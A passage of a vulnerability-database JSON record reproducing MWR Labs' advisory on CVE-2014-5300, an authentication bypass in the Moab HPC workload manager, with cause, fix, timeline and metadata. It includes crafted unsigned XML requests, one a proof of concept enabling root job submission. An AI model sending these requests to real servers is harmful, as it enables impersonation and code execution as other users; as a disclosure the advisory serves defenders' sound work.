"https://vulners.com/securityvulns/SECURITYVULNS:DOC:31196", "title": "Moab Authentication Bypass [CVE-2014-5300]", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", "CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-10T16:57:44", "description": "", "cvss3": {}, "published": "2014-10-02T00:00:00", "type": "exploitdb", "title": "Moab < 7.2.9 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2014-5300", "CVE-2014-5300"], "modified": "2014-10-02T00:00:00", "id": "EDB-ID:34865", "href": "https://www.exploit-db.com/exploits/34865", "sourceData": "##[Moab Authentication Bypass : CVE-2014-5300]##\r\n\r\nSoftware: Moab\r\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\r\nCVE Reference: CVE-2014-5300\r\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\r\n\r\n\r\n##[Description]\r\n\r\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\r\n\r\n\r\n##[Impact]\r\n\r\nSuccessful exploitation could lead to remote code execution.\r\n\r\n\r\n##[Cause]\r\n\r\nThe Moab server does not appropriately authenticate requests.\r\n\r\n\r\n##[Solution]\r\n\r\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\r\n\r\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \r\n\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor=\"test\" timestamp=\"1408488412\">\r\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\r\n\r\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\r\n\r\nThe following message contains no signature element and therefore will be accepted by the server:\r\n\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\r\n <Body actor=\"test\" timestamp=\"1408488412\">\r\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\r\n\r\n\r\n##[Proof of Concept]\r\n\r\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \r\n\r\n00000238\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" version=\"8.0.beta.2\"><Body actor=\"root\" timestamp=\"1404856164\"><Request action=\"modify\" actor=\"root\" args=\"ALLOWROOTJOBS TRUE\"><Object>sched</Object></Request></Body></Envelope>\r\n\r\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\r\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\r\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue \r\n2014-07-14 : Moab 8 released\r\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-16 : Moab 7.2.9 released\r\n2014-09-25 : Public release of advisory \r\n\r\n\r\nhttp://labs.mwrinfosecurity.com", "sourceHref": "https://www.exploit-db.com/download/34865", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}